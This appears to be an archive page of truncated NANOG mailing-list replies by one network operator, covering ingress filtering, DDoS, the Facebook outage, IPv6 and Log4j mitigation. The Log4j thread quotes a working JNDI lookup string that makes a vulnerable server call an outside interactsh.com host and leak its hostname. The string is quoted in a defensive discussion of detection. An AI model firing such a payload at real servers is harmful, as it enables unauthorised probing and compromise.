RE: Ingress filtering on transits, peers, and IX ports

Hi Brian, "However, I recognized a SP-specific case where we could receive legitimate traffic sourcing from our own IP blocks: customers running multi-homed BGP where we have assigned PA space to them. So I added "permit" statements for traffic sourcing from these blocks." If your customers

RE: Ingress filtering on transits, peers, and IX ports

That’s an interesting suggestion There are 2 modes for uRPF. Loose and strict. Which one would you recommend in this scenario and why? There are many ways to solve this and definitely uRPF is one layer of defense. But, probably not the best alone. I advocate a 3 layers approach.

RE: Linux router network cards

-2600v3/4 or newer and faster the clocks, the better. Similar CPU core allocations if you choose TNSR. On Thu, Oct 22, 2020 at 3:21 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: Chelsio cards are probably what you are looking for. https://www.chelsio.com/terminator-

RE: Linux router network cards

Chelsio cards are probably what you are looking for. https://www.chelsio.com/terminator-6-asic/ It's closer to an asic than a traditional nic as the router/firewall rules are pushed directly into the hardware. I don't know how good they are with linux and they seem to be compatible.

Nice work Ron

https://krebsonsecurity.com/2021/01/ddos-guard-to-forfeit-internet-space-occ upied-by-parler/ Jean St-Laurent CISSP #634103 ddosTest me security inc tel:438 806-9800 site:

RE: Nice work Ron

On Behalf Of Jean St-Laurent via NANOG Sent: January 21, 2021 12:17 PM To: 'NANOG' Subject: Nice work Ron https://krebsonsecurity.com/2021/01/ddos-guard-to-forfeit-internet-space-occ upied-by-parler/ Jean St-Laurent CISSP #634103 ddosTest me security inc tel:438 806-9800

RE: DDOS-Guard [was: Parler]

This one ended up in Junk. I guess you pasted too much domain names with "Junk" behaviours.  I removed the domain names from this reply. Interesting list though. Thanks for sharing. Any others got that in their junk? Jean St-Laurent CISSP #634103 ddosTest me security inc site:

RE: MIB Browser Recommendation

Wasn't there a nice one called Luna or something like that? After Net-SNMP, it was my favorite. I can't find it anymore though. Jean -Original Message- From: NANOG On Behalf Of Wes Hardaker Sent: January 27, 2021 3:12 PM To: Graham Johnston Cc: nanog@nanog.org Subject: Re: MIB

RE: RTBH and Flowspec Measurements - Stop guessing when the attack will over

Interesting, Do I read it right that there is no workaround, but the solution is to upgrade to an updated version which include the fix? The solution is just above the workaround. From the same page posted. https://kb.juniper.net/InfoCenter/index?page=content

RE: amazon.com multiple SPF records

records On 2021-06-07 1:17 p.m., Jean St-Laurent via NANOG wrote: What is spf2.0/pra ? Is this new? This is the old (now widely abandoned/depreciated) Sender ID standard. ~ Matt

RE: amazon.com multiple SPF records

What is spf2.0/pra ? Is this new? Jean From: NANOG On Behalf Of Alec Peterson Sent: June 7, 2021 10:35 AM To: Brad Barnett Cc: nanog@nanog.org Subject: Re: amazon.com multiple SPF records Hmm, are you sure? [ec2-user@ip-10-0-0-50 ~]$ dig amazon.com txt

RE: BCP38 on public-facing Ubuntu servers

Bingo! With the -t raw, you can bypass the 1.2 Mpps limitation in iptables per cpusocket, because it's doing a very early drop without crossing the full iptables kernel modules. You can reach close to wrirespeed with the -t raw compare to using the same iptables without -t raw. Jean

RE: NAT devices not translating privileged ports

s that don't follow this behaviour, right? Jean -Original Message- From: Fernando Gont Sent: June 10, 2021 7:09 AM To: j...@ddostest.me; nanog@nanog.org Subject: Re: NAT devices not translating privileged ports Hi, Jean, On Thu, 2021-06-10 at 06:54 -0400, Jean St-Laurent via NANOG

RE: NAT devices not translating privileged ports

Hi Fernando, NTP sounds simple but it could be very complex when you dig deep down and/or get lost in details. Here are 2 things to consider: 1. NTP clients can query NTP servers by using SRC UDP ports > 1024. 2. NTP servers cannot query/sync/communicate to another NTP server when using SRC

RE: Can somebody explain these ransomwear attacks?

Here are some facts that it’s important to not pay them. 80% of ransomware victims suffer repeat attacks, according to new report https://www.cbsnews.com/news/ransomware-victims-suffer-repeat-attacks-new-report/ published June 17th 2021 Don’t pay them. Just clean your mess. 

RE: Can somebody explain these ransomwear attacks?

Hi Jim, Very nice text from you and you seem to offer good hints on how to stop it long term. The reality is that USA is going in the direct opposing direction that you express. The payment to ransomware gangs is now tax-deductible. "Extorted by ransomware gangs? The payments may be

RE: Can somebody explain these ransomwear attacks?

I agree with you that 100% secure is not achievable. The goal is to make your business very difficult to hack that it is no longer economically viable for terrorists to attack it in the first place. That’s the best insurance you can give to your business. Jean

RE: Juniper hardware recommendation

Good monitoring softwares allow to do "preprocessing" before storing the monitored data in database. Saku's formula should work well in this case. I use Zabbix for monitoring big infrastructure. It has many advantages like: - Push or pull metrics (dmz friendly) - Can use many proxies (scale

RE: DDoS attack with blackmail

I also recommend book Art of War from Sun Tzu. All the answers to your questions are in that book. Jean From: NANOG On Behalf Of Lady Benjamin Cannon of Glencoe, ASCE Sent: May 20, 2021 7:18 PM To: Baldur Norddahl Cc: NANOG Operators' Group Subject: Re: DDoS attack with blackmail

RE: DDoS attack with blackmail

with the garbage. If you honestly believe anyone your dealing with is involved with launching attacks you clearly have not done your research into potential partners. On Sat., May 22, 2021, 11:20 a.m. Jean St-Laurent via NANOG, mailto:nanog@nanog.org> > wrote: Some industries can’t afford that

RE: BCP38 on public-facing Ubuntu servers

Maybe you can explore the in kernel feature call RP filter or reverse path filter. In router gear it's called uRPF. cat /proc/sys/net/ipv4/conf/default/rp_filter There are 2 modes: Loose or strict. If your server is BGP multi-homed, then you must use loose. Loose is still very powerful and

RE: NAT devices not translating privileged ports

I believe all devices will translate a privileged ports, but it won't translate to the same number on the other side. It will translate to an unprivileged port. Is it what you meant or really there are some devices that will not translate at all a privileged port? What are you trying to

RE: DDoS attack with blackmail

. @Baldur: do you care to share some metrics? Jean From: NANOG On Behalf Of Jean St-Laurent via NANOG Sent: May 21, 2021 10:52 AM To: 'Lady Benjamin Cannon of Glencoe, ASCE' ; 'Baldur Norddahl' Cc: 'NANOG Operators' Group' Subject: RE: DDoS attack with blackmail I also recommend book Art

RE: QUIC, Connection IDs and NAT

The first thing that comes to mind is to check the NAT timers. By default, TCP is 86400 seconds or 24h. Udp is usually shorter at around 300 seconds or 5 minutes. This is not a standard, but it seems to be broadly accepted in the industry. I am not sure, if UDP/443 should be left at 300 or

RE: QUIC, Connection IDs and NAT

Hey Rob, quick question for you. Are you able to see the connection ID when you are forwarding the frames and doing NAT? I thought this is encrypted. Can you confirm? Thanks Jean -Original Message- From: NANOG On Behalf Of Jean St-Laurent via NANOG Sent: June 1, 2021 6:51 AM

RE: Layer 2 based anycast - Kind like GLBP - Research

Maybe a spine and leaf architecture could work for you. You could install 1 server per leaf or more. I believe this could achieve high-availability and load-balancing at layer 2. There is a kind of layer 3 overlay, but for the hosts this is transparent and it feels like a real pure

RE: shadowserver.org

What is the difference between shodan.io and shadowserver.org ? Jean

RE: shadowserver.org

Great list. ShadowServer is there twice on page 7. They must be noisy  Jean -Original Message- From: NANOG On Behalf Of Hank Nussbacher Sent: June 28, 2021 2:50 PM To: nanog@nanog.org Subject: Re: shadowserver.org > What is the difference between shodan.io and shadowserver.org ?

RE: DoD IP Space

I’d be interested in an objective recap of this thread. It seems like we could do a Netflix series for networkers about it.  Anyone would like to give it a try to summarize the story back from the 80’s till today and explain what is at stake here? Thanks Jean From: NANOG On

RE: EMail server gets blocked by Microsoft

I just unlocked ddostest.me with this tool for outlook.com, Hotmail.com, msn.com and maybe all the O365 suite. It was fix in less than 24 hours. Thanks for the tip Jean From: NANOG On Behalf Of Mike Hammett Sent: April 28, 2021 7:52 AM To: Michael Fallen Cc: nanog@nanog.org

RE: DoD IP Space

This is true and very interesting, but the opposite is also true. They are now reachable from probably nearly anywhere and therefore open for business.  Let's see what will slowly appear in shodan.io and shadowserver.org Jean -Original Message- From: NANOG On Behalf Of William

RE: Retalitory DDoS

You got RTBH? From: Mike Hammett Sent: February 8, 2021 12:50 PM To: Jean St-Laurent Cc: NANOG list Subject: Re: Retalitory DDoS In my case, it was against a server not on my own network, so my impact was a blackhole for an hour at 4 AM local time. I likely wouldn't have even noticed

RE: Retalitory DDoS

I would not for 2.5 Gbps So if you were down for 1 hour with 2.5 Gbps and it’s probably not a black hole. There might be something else valuable in this report. Maybe 2.5 Gbps is not the damaging factor here unless your server has only 1 Gbps nic, then it could explain. But, I doubt.

RE: Retalitory DDoS

Nice report, If you would have to pick up just one vector out of this “multi-vector” attack, which one seems to be the one that had the bigger effect on your network or service? Was it degraded or total service interruption? Jean From: NANOG On Behalf Of Mike Hammett Sent:

RE: [EXTERNAL] Re: Retalitory DDoS

Good analyze Hugo, I believe that all of this volumetric attack is just noise to hide the real attack that really killed your webserver. TCP Flag: SYN: 100% I would start with this line and I agree that Roland’s deck might have something about SYN flood. Jean From: Hugo

RE: Suspicious IP reporting

I do not know Tom personally, but I’ve been following his comments, hindsight and shared experience. Tom seems to be a bigger player than you on this mailing list. Joe, you are only penalizing yourself by banning him. I would personally not ban him. J From: Jean St-Laurent Sent:

RE: Suspicious IP reporting

So what? I’ve scanned the internet more than 100’ times on all ports/protocols than you can imagine with zmap and many other shabby tools. I agree with Tom that these absue reports are totally useless and create so much noise that it feels like crying wolf. Network operator are trained to

RE: wow, lots of akamai

I remembered working for a big ISP in Europe offering cable tv + internet with +20M subscribers Every time there was a huge power outage in major cities, all tv`s would go off at the same time. I don`t have stats on power grid stability in Europe Vs N/A. The problem, was when the power was

RE: wow, lots of akamai

No I didn't suggest that. -Original Message- From: NANOG On Behalf Of Niels Bakker Sent: April 1, 2021 3:21 PM To: nanog@nanog.org Subject: Re: wow, lots of akamai * nanog@nanog.org (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty some

RE: wow, lots of akamai

@nanog.org Subject: Re: wow, lots of akamai On Thu, Apr 1, 2021 at 12:23 Niels Bakker mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at

RE: wow, lots of akamai

April 1, 2021 2:21:24 PM Subject: Re: wow, lots of akamai * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also

RE: wow, lots of akamai

mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also have some >mechanis

RE: wow, lots of akamai

Bakker mailto:na...@bakker.net> > wrote: * nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]: >An artificial roll out penalty somehow? Probably not at the ISP >level, but more at the game level. Well, ISP could also have som

BGP and The zero window edge

Nice article explaining a specific BGP corner case not removing routes when TCP window reaches 0. https://blog.benjojo.co.uk/post/bgp-stuck-routes-tcp-zero-window The proposed solution is a new RFC for BGP with the suggestion to introduce a new timer. Fascinating! Jean St-Laurent /CISSP

RE: Google IP Geolocation

I was not sure what a TI-99/4a is. I thought it's a new kind of phone. Lol You got me! Jean -Original Message- From: NANOG On Behalf Of Jared Mauch Sent: April 10, 2021 7:10 PM To: Laura Smith Cc: nanog@nanog.org Subject: Re: Google IP Geolocation I've had a similar issue in the

RE: Suspicious IP reporting

Hi Joe & Joe, I’m not sure which Joe is the original Joe anymore, but I like this reply better than the previous one. It feels more informative and more useful to the community. I just stumbled on this article.

RE: Where to get IPv4 block these day

What is the average price per ip address for /24 with good reputation vs /24 with questionable reputation? Can you extrapolate too to /21 and /20? Jean From: NANOG On Behalf Of Tony Wicks Sent: August 5, 2021 4:08 PM To: 'NANOG' Subject: RE: Where to get IPv4 block these day

RE: uPRF strict more

I understand better why some prefer acl vs uRpf. For sure, forwarding 400 Gbps of 80B frames is a sign that something bad is happening.  Jean -Original Message- From: brad dreisbach Sent: September 29, 2021 4:18 PM To: Jean St-Laurent Cc: 'brad dreisbach' ; 'Phil Bedard' ; 'North

RE: uPRF strict more

Hi Brad, I'd be interested to hear more about this pps penalty. Do we talk about 5% penalty or something closer to 50%? Let me know if you still have some numbers close to you related to PPS with uRPF loose. Thanks Jean -Original Message- From: NANOG On Behalf Of brad dreisbach

RE: uPRF strict more

Thanks a lot for sharing. So 100 Gbps at line rate with 80B frames is about ~150 Mpps. 100 Gbps at line rate with 208B frames is about ~60 Mpps. It's a significant penalty. Jean -Original Message- From: brad dreisbach Sent: September 29, 2021 3:33 PM To: Jean St-Laurent Cc: 'brad

RE: DNS pulling BGP routes?

Something public that we know now, is that it's possible to totally shut down facebook and restart it. Can we shutdown the full internet one day and see if it will restart properly without too much hack here and there? Jean -Original Message- From: NANOG On Behalf Of Mark Tinka

RE: DNS pulling BGP routes?

Nice document. In section 2.5 Routing, this is written: Distributing Authoritative Name Servers via Shared Unicast Addresses... organizations implementing these practices should always provide at least one authoritative server which is not a participant in any shared unicast mesh. Could

RE: DNS pulling BGP routes?

Well said Bill. I agree with you about having all your tech/adm records + registrar on the same NS... especially for your OOB domain. Probably what killed them. They lost access to their fb-00b-net-mgmt.io cool dns name network. It just went from bad to worst when they realized that they

RE: slack.com

Friday is always a good day to do such change. :D -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: October 2, 2021 2:17 AM To: Bill Woodcock Cc: nanog@nanog.org Subject: Re: slack.com On 10/2/21 08:14, Bill Woodcock wrote: > We did not use an NTA, but we did flush our

RE: massive facebook outage presently

The glue records for the NS are set at 48 hours. dig @c.gtld-servers.net. facebook.com. NS ;; facebook.com. 172800 IN NS a.ns.facebook.com. facebook.com. 172800 IN NS b.ns.facebook.com. facebook.com. 172800 IN NS

RE: Facebook post-mortems...

-mortems... On Tue, Oct 5, 2021 at 5:44 AM Mark Tinka mailto:mark@tinka.africa> > wrote: On 10/5/21 14:08, Jean St-Laurent via NANOG wrote: > Maybe withdrawing those routes to their NS could have been mitigated by > having NS in separate entities. Well, doesn't really matte

RE: Facebook post-mortems...

network reachability as almost bulletproof and that it will never disappear. Which is probably true most of the time. Until yesterday happens and the 9's in your reliability percentage change to 7's. On Tue, Oct 5, 2021 at 8:10 AM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote:

RE: Facebook post-mortems...

Maybe withdrawing those routes to their NS could have been mitigated by having NS in separate entities. Let's check how these big companies are spreading their NS's. $ dig +short facebook.com NS d.ns.facebook.com. b.ns.facebook.com. c.ns.facebook.com. a.ns.facebook.com. $ dig +short google.com

RE: massive facebook outage presently

I don't understand how this would have helped yesterday. >From what is public so far, they really paint themselves in a corner with no >way out. A classic, but at epic scale. They will learn and improve for sure, but I don't understand how "firmware default to your own network" would have help

RE: Facebook post-mortems...

different entities for DNS is not financially viable? Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: October 5, 2021 8:22 AM To: nanog@nanog.org Subject: Re: Facebook post-mortems... On 10/5/21 14:08, Jean St-Laurent via NANOG wrote: > Maybe withdrawing th

RE: Facebook post-mortems...

Does anyone have info whether this network 69.171.240.0/20 was reachable during the outage. Jean From: NANOG On Behalf Of Tom Beecher Sent: October 5, 2021 10:30 AM To: NANOG Subject: Re: Facebook post-mortems... People keep repeating this but I don't think it's true. My comment

RE: Facebook post-mortems...

y true most of the time. Until yesterday happens and the 9's in your reliability percentage change to 7's. On Tue, Oct 5, 2021 at 8:10 AM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: Maybe withdrawing those routes to their NS could have been mitigated by having NS in

RE: massive facebook outage presently

Maybe the key to solve this issue is in an email sent to some_very_important_t...@facebook.com -Original Message- From: NANOG On Behalf Of tomocha Sent: October 4, 2021 2:32 PM To: nanog@nanog.org Subject: Re: massive facebook outage presently Hi Some of the DNS addresses are no

RE: Anyone else expereincing phone line issues from west to east ?

It’s still on going? It’s been more than a week now. I thought these were resolve already. Ransomware are down since few months. I guess that’s why DDoS with ransom are back on the rise. Jean From: NANOG On Behalf Of Mel Beckman Sent: September 27, 2021 5:56 PM To: babydr DBA

RE: private 5G networks?

. While at it, make sure you tell your CFO that you want it on IPv6.  Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: December 6, 2021 7:46 AM To: nanog@nanog.org Subject: Re: private 5G networks? On 12/4/21 16:52, Jean St-Laurent via NANOG wrote: > Maybe the m

RE: private 5G networks?

I vouch for fairness. It seems there might be a shift in how we consume services around the world. It's like a train. You can't turn 90 degrees. You need to start a smooth curve many miles ahead if you want your train to turn and reach the destination. How leaders govern will be more

RE: private 5G networks?

You're absolutely right and I agree with your line of thought. Strangely, there is apparently a lawsuit of $150B against Meta for for facilitating Rohingya Genocide . I am not sure how valid it is and where it will go, but $150B is quite something. It looks like the price a country has to pay

RE: private 5G networks?

Maybe the main argument is: run a Pegasus free 5g/lte network. Mr. Besos was hack by that and it's probably a technical way to start protecting customers against that kind of sophisticated spywares that spread in the normal mobile network. I might be wrong and probably Pegasus can still

RE: private 5G networks?

more secure. I'm sure you know the answer to that. Private 5G is just a method for local spectrum allocation that does not require a full FCC license. That's it. On Mon, Dec 6, 2021 at 12:37 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: You're absolutely right

RE: IPv6 and CDN's

Ipv6 can be shorter than ipv4. Here is the proof: ping6 ::1 is shorter than ping 127.1 ipv6 addresses can be very small when done properly. Jean -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: November 28, 2021 5:39 AM To: nanog@nanog.org Subject: Re: IPv6 and CDN's

RE: IPv6 and CDN's

I like to put some servers behind that scheme. 2601::443: for https servers 2601::25: for MTA servers. 2601::993: for IMAP It gives a quick note of what is that ip even though it’s ipv6 and usually non-human readable. Not sure what kind of scheme is use by medium/big

RE: IPv6 and CDN's

I remember when I was a junior in a major NOC, we had this management host with a local hosts file for all critical components. Probably worth reviewing some old school techniques.  If you can automate your gazillion routers business, you probably can also automate a couple of hosts

RE: IPv6 and CDN's

With a kicking ass pitch -Original Message- From: NANOG On Behalf Of Mark Tinka Sent: November 26, 2021 5:52 AM To: nanog@nanog.org Subject: Re: IPv6 and CDN's On 11/3/21 22:13, Max Tulyev wrote: > Implementing IPv6 reduces costs for CGNAT. You will have (twice?) less > traffic flow

RE: IPv6 and CDN's

Here are some maths and 1 argument kicking ass pitch for CFO’s that use iphones. Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4 https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-as-its-1-4-times-faster-than-ipv4/ Build around that maybe? Jean From:

RE: IPv6 and CDN's

With that specific line directly from Apple: "And when IPv6 is in use, the median connection setup is 1.4 times faster than IPv4. This is primarily due to reduced NAT usage and improved routing." There it is, Improved routing. Jean From: Jean St-Laurent Sent: November 26, 2021

RE: IPv6 and CDN's

> > wrote: On 11/26/21 1:44 PM, Jean St-Laurent via NANOG wrote: Here are some maths and 1 argument kicking ass pitch for CFO’s that use iphones. Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4 https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-as-its-1-4

RE: IPv6 and CDN's

But CFOs like monetization. Was that thread about IPv6 or CFO? From: Michael Thomas Sent: November 26, 2021 7:37 PM To: Oliver O'Boyle Cc: Jean St-Laurent ; Ca By ; North American Network Operators' Group Subject: Re: IPv6 and CDN's That's a start, I guess. Before all they had was

RE: anyone use fbtracert successfully?

smokeping in master slave mode. A bit old school, but maybe still worth a try. https://oss.oetiker.ch/smokeping/doc/smokeping_master_slave.en.html Jean From: NANOG On Behalf Of Adam Thompson Sent: November 25, 2021 1:31 PM To: Hugo Slabbert ; Thomas Scott Cc: nanog Subject: RE:

RE: possible rsync validation dos vuln

The link doesn't work. 404 https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendm What are the specs of that possible dos vuln? Is is reflection or amplification or something else? Thanks Jean

RE: possible rsync validation dos vuln

https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendmaking-cvd-procedure-rpki -Original Message- From: NANOG On Behalf Of Niels Bakker Sent: October 29, 2021 2:01 PM To: nanog@nanog.org Subject: Re: possible rsync validation dos vuln * nanog@nanog.org (Jean St-Laurent

RE: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu)

I understand now and I agree with you that there’s something fishy there. Fear sells. Thanks Jean From: Ca By Sent: December 9, 2021 10:47 AM To: Jean St-Laurent Cc: Arne Jensen ; nanog@nanog.org Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ?

RE: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu)

What is a ddos death spiral? Jean From: NANOG On Behalf Of Ca By Sent: December 9, 2021 9:36 AM To: Arne Jensen Cc: nanog@nanog.org Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ? (european-union.europa.eu) and you feeding the vendor / hacker ddos death spiral

RE: Latency/Packet Loss on ASR1006

If you still need netflow to gain some visibility on what’s happening, you could check the percentage of netflow export. Usually 1/1000 is good or 0.1%. Maybe for you 1/1 000 000 could be good enough too. If 100% was used, then indeed there are some real time performance penalties.

RE: private 5G networks?

, 2021 at 12:37 PM Jean St-Laurent via NANOG mailto:nanog@nanog.org> > wrote: You're absolutely right and I agree with your line of thought. Strangely, there is apparently a lawsuit of $150B against Meta for for facilitating Rohingya Genocide . I am not sure how valid it is and where it w

RE: Log4j mitigation

This should translate in a query from your infected server toward an infected server controlled by a malicious hacker on port 389. x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} Right? Jean -Original Message- From: Jörg Kost Sent: December 13, 2021

RE: Log4j mitigation

Well if you look to the right you won't see it, but if you look to the left you will see it. Meaning, that for a successful attack to work, the infected host needs to first download a payload from ldap. And ldap runs on port 389/636. You probably can't see the log4j vulnerability in the

RE: Log4j mitigation

mitigation It's not true. It can pull from other ports, URLs, make DNS calls, and seems to evaluate even from environment variables. It's a "virtual machine". On 13 Dec 2021, at 11:54, Jean St-Laurent via NANOG wrote: > Well if you look to the right you won't see it, but if you look to th

RE: Log4j mitigation

What your netflows, pflow, whatever logging system you have show on port 389, 636 in the last 4 days? If you reply nothing... I will admit my mistake here publicly. I will be happy to be wrong in your face. Jean -Original Message- From: Saku Ytti Sent: December 13, 2021 6:33 AM To:

RE: Log4j mitigation

and panic. On Mon, 13 Dec 2021 at 13:14, Jean St-Laurent via NANOG wrote: > > You are right, but it's still a good place to start looking. > > What do you recommend? Panic? > > It won't help you. > > Jean > > -Original Message- > From: Jörg Kost > Sent:

RE: Log4j mitigation

I agree, As an example that back what you're saying, I pasted the ip provided by Jörg in my browser. http://45.83.64.1/ Here is the html page returned. ... Research Scanning Project This is a scanner of a research scanning project. If you want to exclude your IPs from scans, please send an

RE: Log4j mitigation

Indeed, it is extremely used. This new threat seems to behave like a worm. What was the last worm-like virus? I recall sql slammer or something like that in early 2000. Was there any other very popular worm between 2003 and now? Thanks Jean From: NANOG On Behalf Of Alain

RE: [EXTERNAL] Re: Flow collection and analysis

Why DNS are still travelling in clear text? The software running the DNS services worldwide are probably written in C or any languages you mentioned below. Why don't they just strap a libressl on DNS or NanoSSL? Okay, there is DNS over https. I don't know the stats, but I doubt it's close to

RE: Cloudflare Abuse Contact

Cloudlfare might be able to help, but dns flood might be spoofed. It's possible that Cloudflare is not the one sending you that junk. Is it UDP DNS flood or it's some kind of DNS of TCP/Https? Jean > On 1/7/2022 11:06 AM, Mike Hale wrote: the issue we're seeing (a massive DNS flood).

RE: Flow collection and analysis

I agree with you. The tool doesn’t really matter. Windows, linux, cloud or not. It’s really important to first understand what are you trying to solve or improve? If this step is forgotten, then it will just be another tool to support to add in your long list of useless tools. My